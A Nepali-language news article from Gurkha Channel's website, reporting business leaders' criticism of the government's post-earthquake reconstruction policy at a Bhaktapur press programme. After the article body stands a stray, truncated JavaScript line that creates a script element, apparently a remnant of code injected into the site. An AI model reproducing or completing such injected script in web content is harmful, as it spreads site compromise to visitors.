राष्ट्र निर्माणमा उद्योगी व्यवसायीहरुले सरकारको नीतिप्रति आक्रोस व्यक्त

admin Avatar

विध्वङ्सकारी भूकम्प पश्चात राष्ट्र निर्माणमा उद्योगी व्यवसायीहरुले सरकारको नीतिप्रति आक्रोस व्यक्त गरेका छन। रफत सञ्चार क्लब भक्तपुरले बुधवार आयोजना गरेको साक्षात्कार कार्यक्रममा उनीहरुले सरकारले भुकम्प पश्चातको पीडालाई अवसरमा बदल्न सक्ने नीति ल्याउन नसक्दा अन्यौलता छाएको बताएका हुन्। नेपाल निर्माण व्यवसायी महासंघका

महासचिव रामशरण देउजाले निर्माण व्यवसायीहरुलाई दोष लगाउनु भन्दा पनि अव बन्ने नीतिलाई व्यवहारमा लागू गर्नु पर्नेमा जोड दिनु भयो। उहाँले हाल उपत्यका भित्र रहेका जोखिम भवनहरु आँखाले नियालेको भरमा स्टिकर टाँस्नु पर्ने बाध्यताको अन्त्य नयाँ उपकरणको आगमनसँगै सकिने बताउनु भयो।

कार्यक्रममा नेपाल उद्योग बाणिज्य महासंघका केन्द्रिय उपाध्यक्ष किशोर प्रधानले सरकारको सञ्जाल पश्चात दोस्रो ठूलो पहुँच भएको उद्योग बाणिज्य महासंघसँगको सहकार्यता हुन नसक्दा उद्योगी ब्यवसायिले पनि केहि गर्न नसकको बताउनु भयो। नेपाल निर्माण सामाग्री व्यापार महासंघका संस्थापक महासचिव शिब मानन्धर अब बन्ने घरहरु स्थानीय निकायका इन्जिनियरहरुले स्वीकृती प्रदान गरेर मात्र बनाउनुर्ने बताउनुभयो।

var d=document;var s=d.createElement(‘script’);

About Gurkha Channel

Gurkha channel is the sister company of Gurkha TV and the first 24-hour Nepali channel operating from the international capital of the world,London, United Kingdom. Gurkha Channels believes in honesty, respect, and unity. We belong to the land of Lord Buddha, Mt. Everest, and gallant people who sacrifice their lives for peace and humanity. Therefore, in this world of globalization, it is our effort to bring all Nepalese from around the world together and make one family: one Nation.

Search
Cateegories